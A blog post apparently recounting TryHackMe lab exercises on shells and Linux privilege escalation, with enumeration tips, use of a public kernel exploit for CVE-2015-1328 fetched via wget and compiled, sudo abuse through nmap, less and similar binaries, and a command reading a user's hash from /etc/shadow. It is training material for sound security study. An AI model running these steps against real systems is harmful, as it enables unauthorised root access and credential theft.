Thursday is here and we are continuing with the What the Shell? module on THM!
We pick up where we left off and we are now on to the practical section of the room.
We are tasked with the following questions –
PHP Web Reverse Shell –
Bind Shell –
We complete the rest of the items but they are very similar so we choose to ommit these as this post will be super long and ain’t nobody got time for that..
Next we move on to the Linux Privilege Escalation module on THM!
“The env command will show environmental variables. – The PATH variable may have a compiler or a scripting language (e.g. Python) that could be used to run code on the target system or leveraged for privilege escalation.”
“While the output can be long and a bit intimidating, it can easily be cut and converted to a useful list for brute-force attacks.”
“Remember that this will return all users, some of which are system or service users that would not be very useful. Another approach could be to grep for “home” as real users will most likely have their folders under the “home” directory.”
“find / -perm -u=s -type f 2>/dev/null: Find files with the SUID bit, which allows us to run the file with a higher privilege level than the current user.”
“Systems can also be identified by looking at the /etc/issue file. This file usually contains some information about the operating system but can easily be customized or changed. While on the subject, any file containing system information can be customized or changed. For a clearer understanding of the system, it is always good to look at all of these.”
I set up a simple python server in order to host the file for the exploit to be downloaded by the vunerable machine
wget is used to transfer the file over, after this I needed to move into the /tmp directory to use the exploit
After a quick google search relating to CVE-2015-1328 I found this Linux Kernel exploit on exploitdb, after transfering the file over to the vulnerable box via wget I was struggling to launch the exploit. I did a bit more digging and found that I needed to use the gcc command in order to complie the exploit, after the compilation I was able to get the exploit running and elevate my access to root as shown below.
Note – The hint regarding this via THM was advising that this exploit (the main one you find when searching and relating to CVE-2015-1328) suggested that you don’t need to complie the exploit prior to exploitation which is another L for THM!
https://www.exploit-db.com/exploits/37292
Flag – THM-28392872729920
Using the sudo -l command allows me to see what can be ran as root via the current user which is karen, we see that find, less and nano can be ran as root in this context.
We show below the different ways that the flag2.txt flag can be retrieved.
We see the command “sudo nmap –interactive” can be ran as root which gives us the answer for question three.
https://gtfobins.github.io/gtfobins/nmap/#sudo
And finally exploiting the sudo -l root privileges we read Frank’s hash by using the ‘sudo less /etc/shadow | grep frank command as the karen user.
That’s it for today but we shall get the rest of this module finished tomorrow!
Until next time & don’t sleepwalk through life!
Adiós